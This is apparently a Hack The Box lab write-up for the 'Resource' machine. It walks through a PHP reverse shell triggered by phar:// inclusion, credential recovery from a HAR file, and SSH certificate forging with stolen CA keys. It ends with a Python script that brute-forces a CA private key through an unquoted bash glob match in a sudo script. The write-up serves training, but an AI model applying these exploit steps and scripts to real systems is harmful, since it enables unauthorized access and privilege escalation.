• Platform: Hack The Box
  • Link: Resource
  • Level: Hard
  • OS: Linux

Resource revolves around exploiting SSH and Certificate Authority files. The initial access is gained through a PHAR deserialization attack targeting a file upload feature. Next, we recover user credentials from a HAR file, which facilitates lateral movement to another user account. During this process, we discover certificate authority keys, enabling us to generate SSH keys and log in as yet another user. After gaining access to a different host, we escalate our privileges by exploiting a glob injection vulnerability in a bash script, ultimately gaining root access.

Target IP address -


./nmap_scan.sh Resource


Running detailed scan on open ports: 22,80,2222
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-22 18:47 CST
Nmap scan report for
Host is up (0.060s latency).

22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 78:1e:3b:85:12:64:a1:f6:df:52:41:ad:8f:52:97:c0 (ECDSA)
|_  256 e1:1a:b5:0e:87:a4:a1:81:69:94:9d:d4:d4:a3:8a:f9 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://itrc.ssg.htb/
2222/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f2:a6:83:b9:90:6b:6c:54:32:22:ec:af:17:04:bd:16 (ECDSA)
|_  256 0c:c3:9c:10:f5:7f:d3:e4:a8:28:6a:51:ad:1a:e1:bf (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.97 seconds

The target is running two different versions of SSH: 9.2p1 on port 22 and 8.9p1 on port 2222. It also has HTTP running on port 80 with a redirection to http://itrc.ssg.htb/ which we add it to the etc/hosts file.

sudo echo " itrc.ssg.htb" | sudo tee -a /etc/hosts


We find a website for a resource center at http://itrc.ssg.htb/ with a register/login feature.

Resource website

After logging in with our newly created account we are able to submit a new ticket at http://itrc.ssg.htb/?page=dashboard.

Ticekts list

Clicking on New Ticket takes us to http://itrc.ssg.htb/?page=create_ticket.

New ticket creation

Two things are noteworthy here:

  • the ?page parameter might be vulnerable to LFI
  • we might be able to bypass the restrictions of the upload feature and upload a reverse shell

Let’s create a ticket and upload a random zip file to observe how the application works.

file upload test

We can click anywhere on a specific ticket to open it and get more information.

upload folder

While hovering over our file we learn that it is stored in the /uploads directory. With Wappalyzer we see that we are dealing with a PHP application, let’s try uploading a PHP reverse shell.


On revshells we can use the PHP Ivan Sincek shell to create a zip file and upload it on the target.

reverse shell zip

reverse shell upload

Both http://itrc.ssg.htb/?page=/uploads/9870e12def3a5dbd118d0a66164fd72036d08d4e.zip/revshell.php and http://itrc.ssg.htb/uploads/9870e12def3a5dbd118d0a66164fd72036d08d4e.zip/revshell.php fail to trigger the reverse shell so we need to find another way of executing our file.

reverse shell trigger failure

Initial Foothold

After some research we discover the PHAR (PHP Archive) deserialization attack explained here and here.

When we create a .zip archive containing the revshell.php file and access it using the phar:// stream wrapper, PHP treats the .zip file as a PHAR-compatible archive. The phar:// protocol allows PHP to directly access files within the archive, including executable PHP scripts. When the URL http://itrc.ssg.htb/?page=phar://uploads/.../revshell is processed, the server executes the revshell.php file within the archive as PHP code, triggering the reverse shell. This works because the server uses an insecure file inclusion mechanism (include, require, or similar) without properly validating or restricting the file path, allowing code execution through the phar:// wrapper.

Using http://itrc.ssg.htb/?page=phar://uploads/9870e12def3a5dbd118d0a66164fd72036d08d4e.zip/revshell we successfully trigger the reverse shell. We obtain a connection on our listener as www-data and we are in /var/www/itrc.

phar reverse shell


In the uploads directory we find many ZIP archives, we personally uploaded only two of them so let’s see what the other ones contain.

application upload directory

upload directory content

We run the command below to extract all the archives in the folder.

for file in *.zip; do unzip "$file"; done

bulk extraction

After the extraction we recover some public keys (for the Ed25519 and RSA algorithms), a .har file and the files we previuosly uploaded.

.har files are JSON-formatted text files containing detailed information about HTTP requests and responses during a browsing session.

files after extraction

Shell as msainristil (on itrc host)

With cat /etc/passwd we notice two users on the system msainristil and zzinter. Using cat itrc.ssg.htb.har | grep msainristil we recover some credentials which are msainristil:82yards2closeit.

user list

msainristil credentials

We login via SSH with the credentials obtained but still no user flag, instead we have some files related to a certificate of authority.

ca-itrc and ca-itrc.pub are very likely the private and public keys of a Certificate Authority used for signing certificates, which can include SSH keys or other types of certificates.

CA files

Shell as zzinter (on itrc host)

Since we have access to the CA private key, we can create a SSH key to login as zzinter.

  1. Create an SSH Key Pair for zzinter.
ssh-keygen -t rsa -b 4096 -f id_rsa_zzinter
ssh-keygenCommand-line tool used to generate SSH keys.
-t rsaSpecifies the type of key to create (RSA key pair in our case).
-b 4096Bit length, our RSA key will have a length of 4096 bits.
-f id_rsa_zzinterSpecifies the filename.

zzinter keys

  1. Create the SSH Certificate for zzinter.
ssh-keygen -s ca-itrc -I zzinter_key_id -n zzinter -V +52w id_rsa_zzinter.pub
-s ca-itrcPath to the CA’s private key.
-I zzinter_key_idUnique identifier for the certificate (you can pick any name).
-n zzinterThe principal (user) for which the certificate is valid.
-V +52wSets validity period (52 weeks here).
id_rsa_zzinter.pubThe public key we are signing.

zzinter SSH certificate

  1. Login using the SSH key.
ssh -i id_rsa_zzinter zzinter@itrc.ssg.htb

zzinter SSH login

Below is the content of sign_key_api.sh. It automates the process of submitting a public SSH key to the signing service signserv.ssg.htb to generate a signed SSH certificate for a given user.


usage () {
    echo "Usage: $0 <public_key_file> <username> <principal>"
    exit 1

if [ "$#" -ne 3 ]; then


IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
    if ! echo "$supported_principals" | grep -qw "$word"; then
        echo "Error: '$word' is not a supported principal."
        echo "Choose from:"
        echo "    webserver - external web servers - webadmin user"
        echo "    analytics - analytics team databases - analytics user"
        echo "    support - IT support server - support user"
        echo "    security - SOC servers - support user"

if [ ! -f "$public_key_file" ]; then
    echo "Error: Public key file '$public_key_file' not found."

public_key=$(cat $public_key_file)

curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "'"$username"'", "principals": "'"$principal"'"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"

Let’s use the same process from earlier to create a SSH key for root, and see if we find anything of interest there.

ssh-keygen -t rsa -b 4096 -f id_rsa_root
ssh-keygen -s ca-itrc -I root_key_id -n root -V +52w id_rsa_root.pub
ssh -i id_rsa_root root@itrc.ssg.htb

Unfortunately the root folder is empty, but we notice a different IP address mentioned ( This probably means that we are inside a container that we need to break out of.

root SSH login

Shell as support (on ssg host)

The script contains a list of supported principals, so let’s use one of them.

  1. Generate an SSH key for support.
ssh-keygen -t rsa -b 4096 -f id_rsa_support
  1. We use the script to generate a signed SSH certificate for the supported principal support.
bash ./sign_key_api.sh id_rsa_support.pub support support
  • You will receive the SSH certificate in OpenSSH format. You need to put it in a file but we do not have access to a text editor. So use echo "YOUR_SSH_CERTIFICATE" > id_rsa_support-cert.pub.

support SSH certificate

  1. Change the file permissions
chmod 600 id_rsa_support
chmod 600 id_rsa_support-cert.pub
  1. Login via SSH
ssh -i id_rsa_support -p 2222 support@

root SSH login

The hostname of our previous SSH session (with root) was itrc, now we are logged in as support and the hostname is ssg. The home folder of support is empty, and checking the etc/passwd file on this host shows that zzinter is also a user here.

zzinter user on ssg host

Shell as zzinter (on ssg host)

We will repeat the same process and login as zzinter on the new host. The issue here is that we cannot generate a signed certificate by using the script because zzinter is not a supported principal.

Examining the script again we see that it uses curl to fetch the SSH certificate, it expects three things: a public_key, a username, and some principal(s). Currently we lack a valid principal name.

curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "'"$username"'", "principals": "'"$principal"'"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"

The content of /etc/ssh/sshd_config.d/sshcerts.conf shows us that a principal file located at /etc/ssh/auth_principals is used by SSH on this host. Checking the file we find zzinter_temp to be a valid principal namae for zzinter.

SSH principal file

zzinter valid principal name

With all the required elements we can now repeat the process used earlier.

  1. Generate an SSH key for zzinter.
ssh-keygen -t rsa -b 4096 -f id_rsa_zzinter
  1. To obtain our signed certificate we send a request with curl.
curl signserv.ssg.htb/v1/sign -d '{"pubkey": "YOUR_GENERATED_PUBLIC_KEY", "username": "zzinter", "principals": "zzinter_temp"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"
  • Store the certificate in a file.
echo "YOUR_SSH_CERTIFICATE" > id_rsa_zzinter-cert.pub
  1. Modify the file permissions.
chmod 600 id_rsa_zzinter
chmod 600 id_rsa_zzinter-cert.pub
  1. Login as zzinter on the new host.
ssh -i id_rsa_zzinter -p 2222 zzinter@

zzinter ssh login on ssg host

Privilege Escalation - root shell (on ssg host)

The home folder of zzinter only contains the user flag, but running sudo -l we learn that this user can execute /opt/sign_key.sh as root without providing a password.

sudo -l command

The output of sign_key.sh is as below. The script is similar to the sign_key_api.sh script, it uses ssh-keygen to sign an SSH public key using a specified CA private key to create a signed SSH certificate. It expects five arguments and also performs a matching operation with the /etc/ssh/ca-it.


usage () {
    echo "Usage: $0 <ca_file> <public_key_file> <username> <principal> <serial>"
    exit 1

if [ "$#" -ne 5 ]; then


if [ ! -f "$ca_file" ]; then
    echo "Error: CA file '$ca_file' not found."

itca=$(cat /etc/ssh/ca-it)
ca=$(cat "$ca_file")
if [[ $itca == $ca ]]; then
    echo "Error: Use API for signing with this CA."

if [ ! -f "$public_key_file" ]; then
    echo "Error: Public key file '$public_key_file' not found."

IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
    if ! echo "$supported_principals" | grep -qw "$word"; then
        echo "Error: '$word' is not a supported principal."
        echo "Choose from:"
        echo "    webserver - external web servers - webadmin user"
        echo "    analytics - analytics team databases - analytics user"
        echo "    support - IT support server - support user"
        echo "    security - SOC servers - support user"

if ! [[ $serial =~ ^[0-9]+$ ]]; then
    echo "Error: '$serial' is not a number."

ssh-keygen -s "$ca_file" -z "$serial" -I "$username" -V -1w:forever -n "$principal" "$public_key_file"

After reviewing the script carefully we discover a vulnerability, the right side of the matching operation [[ $itca == $ca ]] is not quoted, making this succeptible to brute force attacks. Without those quotes Bash performs pattern matching instead of interpreting the input as a string.

For instance if we have a password matching operation with [[$DB_PASS == mystrongpassword]], inputting mys* will evaluate to true because it is a glob pattern matching any string starting with those three letters. Similarly, in the sign_key.sh script, the line [[ $itca == $ca ]] compares the two strings without quoting allowing us to reconstruct the CA content incrementally by brute forcing it. We use the script below to find the CA content.

In etc/ssh/auth_principals/root we find the valid principal name for root is root_user.

import subprocess

charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=\n "

discovered_ca = "-----BEGIN OPENSSH PRIVATE KEY-----\n"

temp_ca_file = "temp_ca_guess"

while True:
    found_character = False

    for char in charset:
        # Create the temporary CA file with the current guess
        current_guess = discovered_ca + char + "*"
        with open(temp_ca_file, "w") as f:
        result = subprocess.run(
            ["sudo", "/opt/sign_key.sh", temp_ca_file, "test.pub", "root", "root_user", "1"],
        if "Use API for signing with this CA" in result.stdout:
            # Correct character found, append to discovered_ca
            discovered_ca += char
            print(f"[+] Discovered so far: {discovered_ca}")
            found_character = True
            break  # Break inner loop to continue building the CA string
    if not found_character:
        if "-----END OPENSSH PRIVATE KEY-----" in discovered_ca:
            print(f"[!] Full CA content discovered:\n{discovered_ca}")
            print(f"[!] Script terminated prematurely. Partial CA content:\n{discovered_ca}")

After running the script we recover the key and save it in a file (I named it root.key in my case).

We need to add -----END OPENSSH PRIVATE KEY----- to the key manually.


CA content

We can go back to our local machine, and generate SSH keys for root.

  1. Generate a key pair for root
ssh-keygen -f root
  1. Change the permission of the key recovered.
chmod 600 root.key
  1. Create a SSH certificate by signing the public key.
ssh-keygen -s root.key -z 200 -I root -V -52w:forever -n root_user root.pub
-s root.keySpecifies the signing key, which is the private key of the Certificate Authority (CA).
-z 200Specifies the certificate serial number. This is a unique identifier for the certificate.
-I rootSpecifies the key identity string. The identity (root) is an arbitrary label for the certificate.
-V -52w:foreverSpecifies the validity period.
-n root_userSpecifies the authorized principals (usernames or roles).
root.pubSpecifies the public key file being signed. The certificate will be generated for this key, and the resulting file will be named root-cert.pub.
  1. Login as root
ssh root@itrc.ssg.htb -p2222 -i root -i root-cert.pub

The private key (root) provides proof of ownership, while the certificate (root-cert.pub) establishes trust between our key and the server. The server validates the certificate using the CA public key stored in its configuration (from TrustedUserCAKeys), and then uses the private key to complete the authentication process. The certificate tells the server to trust the public key in root.pub because it was signed by the trusted Certificate Authority (CA). Without the certificate, the server wouldn’t recognize the root key as a trusted identity.

root ssh login and flag

Thanks for reading this write up!